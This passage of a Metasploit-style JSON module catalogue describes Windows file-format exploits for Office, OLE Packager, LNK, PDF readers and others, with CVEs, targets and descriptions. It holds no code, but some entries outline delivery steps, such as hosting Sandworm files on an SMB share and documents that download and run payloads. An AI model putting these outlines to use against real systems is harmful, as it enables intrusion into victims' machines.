"description": "This module exploits a vulnerability found in Excel of Microsoft Office 2007.\n By supplying a malformed .xlb file, an attacker can control the content (source)\n of a memcpy routine, and the number of bytes to copy, therefore causing a stack-\n based buffer overflow. This results in arbitrary code execution under the context of\n the user.",
"references": [
"CVE-2011-0105",
"OSVDB-71765",
"MSB-MS11-021",
"ZDI-11-121"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Excel 2007 on Windows XP",
"Microsoft Office Excel 2007 SP2 on Windows XP"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms11_021_xlb_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms12_005": {
"name": "MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",
"full_name": "exploit/windows/fileformat/ms12_005",
"rank": 600,
"disclosure_date": "2012-01-10",
"type": "exploit",
"author": [
"Yorick Koster",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft Office's ClickOnce\n feature. When handling a Macro document, the application fails to recognize\n certain file extensions as dangerous executables, which can be used to bypass\n the warning message. This can allow attackers to trick victims into opening the\n malicious document, which will load up either a python or ruby payload, and\n finally, download and execute an executable.",
"references": [
"CVE-2012-0013",
"OSVDB-78207",
"MSB-MS12-005",
"BID-51284",
"URL-http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146",
"URL-http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Word 2007/2010 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms12_005.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms12_005",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms12_027_mscomctl_bof": {
"name": "MS12-027 MSCOMCTL ActiveX Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms12_027_mscomctl_bof",
"rank": 200,
"disclosure_date": "2012-04-10",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\n RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\n in the wild on April 2012.\n\n This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office\n 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses\n \"msgr3en.dll\", which will load after office got load, so the malicious file must\n be loaded through \"File / Open\" to achieve exploitation.",
"references": [
"CVE-2012-0158",
"OSVDB-81125",
"BID-52911",
"MSB-MS12-027",
"URL-http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English",
"Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms12_027_mscomctl_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms13_071_theme": {
"name": "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",
"full_name": "exploit/windows/fileformat/ms13_071_theme",
"rank": 600,
"disclosure_date": "2013-09-10",
"type": "exploit",
"author": [
"Eduardo Prado",
"juan vazquez <juan.vazquez@metasploit.com>",
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows\n 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]\n section. An arbitrary path can be used as screen saver, including a remote SMB resource,\n which allows for remote code execution when a malicious .theme file is opened, and the\n \"Screen Saver\" tab is viewed. The code execution is also triggered if the victim installs\n the malicious theme and stays away from the computer, when Windows tries to display the\n screensaver.",
"references": [
"CVE-2013-0810",
"OSVDB-97136",
"MSB-MS13-071",
"BID-62176",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms13_071_theme",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms14_017_rtf": {
"name": "MS14-017 Microsoft Word RTF Object Confusion",
"full_name": "exploit/windows/fileformat/ms14_017_rtf",
"rank": 300,
"disclosure_date": "2014-04-01",
"type": "exploit",
"author": [
"Haifei Li",
"Spencer McIntyre",
"unknown"
],
"description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a listoverridecount field can be modified\n to treat one structure as another.\n\n This bug was originally seen being exploited in the wild starting\n in April 2014. This module was created by reversing a public\n malware sample.",
"references": [
"CVE-2014-1761",
"MSB-MS14-017",
"URL-http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers",
"URL-https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office 2010 SP2 English on Windows 7 SP1 English"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/fileformat/ms14_017_rtf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms14_017_rtf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
],
"SideEffects": [
"screen-effects"
]
}
},
"exploit_windows/fileformat/ms14_060_sandworm": {
"name": "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
"full_name": "exploit/windows/fileformat/ms14_060_sandworm",
"rank": 600,
"disclosure_date": "2014-10-14",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly known as \"Sandworm\". Platforms such as Windows\n Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be\n vulnerable. However, based on our testing, the most reliable setup is on Windows platforms\n running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such\n as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to\n a failure in the CPackage::CreateTempFileName function.\n\n This module will generate three files: an INF, a GIF, and a PPSX file. You are required to\n set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an\n older version of Windows (such as XP) work best for this because they require little\n configuration to get going. The PPSX file is what you should send to your target.\n\n In detail, the vulnerability has to do with how the Object Packager 2 component\n (packager.dll) handles an INF file that contains malicious registry changes, which may be\n leveraged for code execution. First of all, Packager does not load the INF file directly.\n As an attacker, you can trick it to load your INF anyway by embedding the file path as\n a remote share in an OLE object. The packager will then treat it as a type of media file,\n and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will\n download it with a CopyFileW call, save it in a temp folder, and pass that information for\n later. The exploit will do this loading process twice: first for a fake gif file that's\n actually the payload, and the second for the INF file.\n\n The packager will also look at each OLE object's XML Presentation Command, specifically the\n type and cmd property. In the exploit, \"verb\" media command type is used, and this triggers\n the packager!CPackage::DoVerb function. Also, \"-3\" is used as the fake gif file's cmd\n property, and \"3\" is used for the INF. When the cmd is \"-3\", DoVerb will bail. But when \"3\"\n is used (again, for the INF file), it will cause the packager to try to find appropriate\n handler for it, which will end up with C:\\Windows\\System32\\infDefaultInstall.exe, and that\n will install/run the malicious INF file, and finally give us arbitrary code execution.",
"references": [
"CVE-2014-4114",
"OSVDB-113140",
"MSB-MS14-060",
"BID-70419",
"URL-http://www.isightpartners.com/2014/10/cve-2014-4114/",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1 / Office 2010 SP2 / Office 2013"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms14_060_sandworm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms14_060_sandworm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms14_064_packager_python": {
"name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
"full_name": "exploit/windows/fileformat/ms14_064_packager_python",
"rank": 600,
"disclosure_date": "2014-11-12",
"type": "exploit",
"author": [
"Haifei Li",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability\n publicly known as \"Sandworm\", on systems with Python for Windows installed. Windows Vista\n SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.\n However, based on our testing, the most reliable setup is on Windows platforms running\n Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as\n those using Office 2010 SP1 may be less stable, and may end up with a crash due to a\n failure in the CPackage::CreateTempFileName function.",
"references": [
"CVE-2014-6352",
"MSB-MS14-064",
"BID-70690",
"URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm"
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms14_064_packager_python.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms14_064_packager_python",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms14_064_packager_run_as_admin": {
"name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
"full_name": "exploit/windows/fileformat/ms14_064_packager_run_as_admin",
"rank": 600,
"disclosure_date": "2014-10-21",
"type": "exploit",
"author": [
"Haifei Li",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.\n The Microsoft update tried to fix the vulnerability publicly known as \"Sandworm\". Platforms\n such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known\n to be vulnerable. However, based on our testing, the most reliable setup is on Windows\n platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other\n setups such as using Office 2010 SP1 might be less stable, and may end up with a\n crash due to a failure in the CPackage::CreateTempFileName function.",
"references": [
"CVE-2014-6352",
"MSB-MS14-064",
"BID-70690",
"URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1 / Office 2010 SP2 / Office 2013"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms14_064_packager_run_as_admin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms15_020_shortcut_icon_dllloader": {
"name": "Microsoft Windows Shell LNK Code Execution",
"full_name": "exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader",
"rank": 600,
"disclosure_date": "2015-03-10",
"type": "exploit",
"author": [
"Michael Heerklotz",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This module creates the required files to exploit the vulnerability. They must be\n uploaded to an UNC path accessible by the target. This module has been tested successfully\n on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.",
"references": [
"CVE-2015-0096",
"MSB-MS15-020",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so",
"URL-https://github.com/rapid7/metasploit-framework/pull/4911"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms15_020_shortcut_icon_dllloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms15_100_mcl_exe": {
"name": "MS15-100 Microsoft Windows Media Center MCL Vulnerability",
"full_name": "exploit/windows/fileformat/ms15_100_mcl_exe",
"rank": 600,
"disclosure_date": "2015-09-08",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Windows Media Center. By supplying\n an UNC path in the *.mcl file, a remote file will be automatically downloaded,\n which can result in arbitrary code execution.",
"references": [
"CVE-2015-2509",
"MSB-MS15-100"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms15_100_mcl_exe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms_visual_basic_vbp": {
"name": "Microsoft Visual Basic VBP Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms_visual_basic_vbp",
"rank": 400,
"disclosure_date": "2007-09-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack overflow in Microsoft Visual\n Basic 6.0. When a specially crafted vbp file containing a long\n reference line, an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2007-4776",
"OSVDB-36936",
"BID-25629"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms_visual_basic_vbp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mswin_tiff_overflow": {
"name": "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow",
"full_name": "exploit/windows/fileformat/mswin_tiff_overflow",
"rank": 200,
"disclosure_date": "2013-11-05",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft's Tagged Image File Format.\n It was originally discovered in the wild, targeting Windows XP and Windows Server 2003\n users running Microsoft Office, specifically in the Middle East and South Asia region.\n\n The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a\n drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,\n and stored in the EAX register. The 32-bit register will run out of storage space to\n represent the large value, which ends up being 0, but it still gets pushed as a\n dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a\n chunk anyway with size 0, and the address of this chunk is used as the destination buffer\n of a memcpy function, where the source buffer is the EXIF data (an extended image format\n supported by TIFF), and is also user-controlled. A function pointer in the chunk returned\n by HeapAlloc will end up being overwritten by the memcpy function, and then later used\n in OGL!GdipCreatePath. By successfully controlling this function pointer, and the\n memory layout using ActiveX, it is possible to gain arbitrary code execution under the\n context of the user.",
"references": [
"CVE-2013-3906",
"MSB-MS13-096",
"OSVDB-99376",
"URL-http://technet.microsoft.com/en-us/security/advisory/2896666",
"URL-http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 with Office Standard 2010"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mswin_tiff_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/msworks_wkspictureinterface": {
"name": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution",
"full_name": "exploit/windows/fileformat/msworks_wkspictureinterface",
"rank": 100,
"disclosure_date": "2008-11-28",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n to execute arbitrary code on a system. By passing a negative integer to the\n WksPictureInterface method, an attacker could execute arbitrary code on the system\n with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\n This control is not marked safe for scripting, please choose your attack vector carefully.",
"references": [
"CVE-2008-1898",
"OSVDB-44458"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2-SP3 IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/msworks_wkspictureinterface",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mymp3player_m3u": {
"name": "Steinberg MyMP3Player 3.0 Buffer Overflow",
"full_name": "exploit/windows/fileformat/mymp3player_m3u",
"rank": 400,
"disclosure_date": "2010-03-18",
"type": "exploit",
"author": [
"n3w7u",
"m_101"
],
"description": "This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When\n the application is used to open a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"OSVDB-64580",
"EDB-11791"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal",
"Windows Universal (SEH)",
"Windows XP SP3 French"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mymp3player_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/netop": {
"name": "NetOp Remote Control Client 9.5 Buffer Overflow",
"full_name": "exploit/windows/fileformat/netop",
"rank": 300,
"disclosure_date": "2011-04-28",
"type": "exploit",
"author": [
"Ruben Alejandro \"chap0\""
],
"description": "This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.\n When opening a .dws file containing a specially crafted string longer then 520\n characters will allow an attacker to execute arbitrary code.",
"references": [
"OSVDB-72291",
"EDB-17223"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/netop.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/netop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/nitro_reader_jsapi": {
"name": "Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution",
"full_name": "exploit/windows/fileformat/nitro_reader_jsapi",
"rank": 600,
"disclosure_date": "2017-07-24",
"type": "exploit",
"author": [
"mr_me <steven@srcincite.io>",
"bcoles <bcoles@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro\n PDF Reader version 11. The saveAs() Javascript API function allows for writing\n arbitrary files to the file system. Additionally, the launchURL() function allows\n an attacker to execute local files on the file system and bypass the security dialog\n\n Note: This is 100% reliable.",
"references": [
"CVE-2017-7442",
"URL-http://srcincite.io/advisories/src-2017-0005/",
"URL-https://blogs.securiteam.com/index.php/archives/3251"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/nitro_reader_jsapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/nuance_pdf_launch_overflow": {
"name": "Nuance PDF Reader v6.0 Launch Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/nuance_pdf_launch_overflow",
"rank": 500,
"disclosure_date": "2010-10-08",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>",
"rick2600"
],
"description": "This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is\n triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record.\n This exploit does not use javascript.",
"references": [
"OSVDB-68514",
"URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Nuance PDF Reader v6.x (XP SP3)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/nuance_pdf_launch_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_dde_delivery": {
"name": "Microsoft Office DDE Payload Delivery",
"full_name": "exploit/windows/fileformat/office_dde_delivery",
"rank": 0,
"disclosure_date": "2017-10-09",
"type": "exploit",
"author": [
"mumbai"
],
"description": "This module generates an DDE command to place within\n a word document, that when executed, will retrieve a HTA payload\n via HTTP from an web server.",
"references": [
"URL-https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563",
"URL-https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office"
],
"mod_time": "2017-12-07 14:44:36 +0000",
"path": "/modules/exploits/windows/fileformat/office_dde_delivery.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_dde_delivery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_excel_slk": {
"name": "Microsoft Excel .SLK Payload Delivery",
"full_name": "exploit/windows/fileformat/office_excel_slk",
"rank": 0,
"disclosure_date": "2018-10-07",
"type": "exploit",
"author": [
"Carter Brainerd",
"Stan Hegt",
"Pieter Ceelen"
],
"description": "This module generates a download and execute Powershell\n command to be placed in an .SLK Excel spreadsheet.\n When executed, it will retrieve a payload via HTTP\n from a web server. When the file is opened, the\n user will be prompted to \"Enable Content.\" Once\n this is pressed, the payload will execute.",
"references": [
"URL-https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files",
"URL-https://www.twitter.com/StanHacked/status/1049047727403937795",
"URL-http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Excel"
],
"mod_time": "2019-02-11 12:37:17 +0000",
"path": "/modules/exploits/windows/fileformat/office_excel_slk.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_excel_slk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_ms17_11882": {
"name": "Microsoft Office CVE-2017-11882",
"full_name": "exploit/windows/fileformat/office_ms17_11882",
"rank": 0,
"disclosure_date": "2017-11-15",
"type": "exploit",
"author": [
"mumbai",
"embedi"
],
"description": "Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.",
"references": [
"CVE-2017-11882",
"URL-https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about",
"URL-https://github.com/embedi/CVE-2017-11882"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office"
],
"mod_time": "2018-08-28 13:44:01 +0000",
"path": "/modules/exploits/windows/fileformat/office_ms17_11882.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_ms17_11882",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_ole_multiple_dll_hijack": {
"name": "Office OLE Multiple DLL Side Loading Vulnerabilities",
"full_name": "exploit/windows/fileformat/office_ole_multiple_dll_hijack",
"rank": 300,
"disclosure_date": "2015-12-08",
"type": "exploit",
"author": [
"Yorick Koster"
],
"description": "Multiple DLL side loading vulnerabilities were found in various COM components.\n These issues can be exploited by loading various these components as an embedded\n OLE object. When instantiating a vulnerable object Windows will try to load one\n or more DLLs from the current working directory. If an attacker convinces the\n victim to open a specially crafted (Office) document from a directory also\n containing the attacker's DLL file, it is possible to execute arbitrary code with\n the privileges of the target user. This can potentially result in the attacker\n taking complete control of the affected system.",
"references": [
"CVE-2015-6132",
"CVE-2015-6128",
"CVE-2015-6133",
"CVE-2016-0041",
"CVE-2016-0100",
"CVE-2016-3235",
"MSB-MS15-132",
"MSB-MS16-014",
"MSB-MS16-025",
"MSB-MS16-041",
"MSB-MS16-070",
"URL-https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html",
"URL-https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html",
"URL-https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"All",
"COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)",
"Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)",
"Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)",
"Shutdown UX / Windows 10 / Office 2016 (MS15-132)",
"MapUpdateTask Tasks / Windows 10 / Office 2016 (MS16-014)",
"Microsoft Visio 2010 / Windows 7 (MS16-070)",
"Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)",
"OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)",
"Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)",
"NPS Datastore server / Windows Vista / Office 2010 (MS16-014)",
"BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_ole_multiple_dll_hijack",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_word_hta": {
"name": "Microsoft Office Word Malicious Hta Execution",
"full_name": "exploit/windows/fileformat/office_word_hta",
"rank": 600,
"disclosure_date": "2017-04-14",
"type": "exploit",
"author": [
"Haifei Li",
"ryHanson",
"wdormann",
"DidierStevens",
"vysec",
"Nixawk",
"sinn3r <sinn3r@metasploit.com>"
],
